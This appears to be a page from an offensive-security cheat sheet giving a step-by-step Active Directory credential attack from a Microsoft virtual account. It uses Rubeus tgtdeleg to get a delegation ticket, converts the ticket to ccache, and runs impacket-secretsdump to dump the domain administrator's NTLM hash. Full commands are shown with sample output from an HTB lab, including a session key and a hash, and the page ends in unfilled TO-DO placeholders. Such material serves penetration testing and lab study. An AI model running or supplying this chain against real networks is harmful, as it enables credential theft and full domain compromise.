Usage Tips:
- Click on a keyword to enable inline editing.
- Click inside a code block to copy (excludes comments).
- Use the button to view examples.
- Click outside to collapse all examples.
Abuse #1: Microsoft virtual account
1. Create a ticket from Microsoft virtual account
.\rubeus.exe tgtdeleg /nowrap /ptt
Sample Output:
PS C:\programdata> .\rubeus.exe tgtdeleg /nowrap /ptt
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.3.2
[*] Action: Request Fake Delegation TGT (current user)
[*] No target SPN specified, attempting to build 'cifs/dc.domain.com'
[*] Initializing Kerberos GSS-API w/ fake delegation for target 'cifs/g0.flight.htb'
[+] Kerberos GSS-API initialization success!
[+] Delegation requset success! AP-REQ delegation ticket is now in GSS-API output.
[*] Found the AP-REQ delegation ticket in the GSS-API output.
[*] Authenticator etype: aes256_cts_hmac_sha1
[*] Extracted the service ticket session key from the ticket cache: W4jpmQuUqxCWpBh7QpPEkePICUi1mU/91EaqO2SfUgs=
[+] Successfully decrypted the authenticator
[*] base64(ticket.kirbi):
doIFVDCCBV ...[SNIP]... lHSFQuSFRC
2. Secrets Dump
1. Convert kirbi to ccache
python3 rubeustoccache.py '<BASE64_TICKET>' secrets.kirbi secrets.ccache
Sample Output:
$ python3 rubeustoccache.py 'doIFVDCCBV ...[SNIP]... lHSFQuSFRC' secrets.kirbi secrets.ccache
╦═╗┬ ┬┌┐ ┌─┐┬ ┬┌─┐ ┌┬┐┌─┐ ╔═╗┌─┐┌─┐┌─┐┬ ┬┌─┐
╠╦╝│ │├┴┐├┤ │ │└─┐ │ │ │ ║ │ ├─┤│ ├─┤├┤
╩╚═└─┘└─┘└─┘└─┘└─┘ ┴ └─┘ ╚═╝└─┘┴ ┴└─┘┴ ┴└─┘
By Solomon Sklash
github.com/SolomonSklash
Inspired by Zer1t0's ticket_converter.py
[*] Writing decoded .kirbi file to secrets.kirbi
[*] Writing converted .ccache file to secrets.ccache
[*] All done! Don't forget to set your environment variable: export KRB5CCNAME=secrets.ccache
2. Secrets Dump
export KRB5CCNAME=secrets.ccache
Sample Output:
$ export KRB5CCNAME=secrets.ccache
sudo ntpdate -s <DC> && impacket-secretsdump <TARGET> -k -no-pass -just-dc-user administrator
Sample Output:
$ sudo ntpdate -s g0.flight.htb && impacket-secretsdump g0.flight.htb -k -no-pass -just-dc-user administrator
Impacket v0.12.0.dev1+20240730.164349.ae8b81d7 - Copyright 2023 Fortra
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:43bbfc530bab76141b12c8446e30c17c:::
...[SNIP]...
[*] Cleaning up..
Ref: RubeusToCcache
1. TO-DO
TO-DO
Sample Output:
TO-DO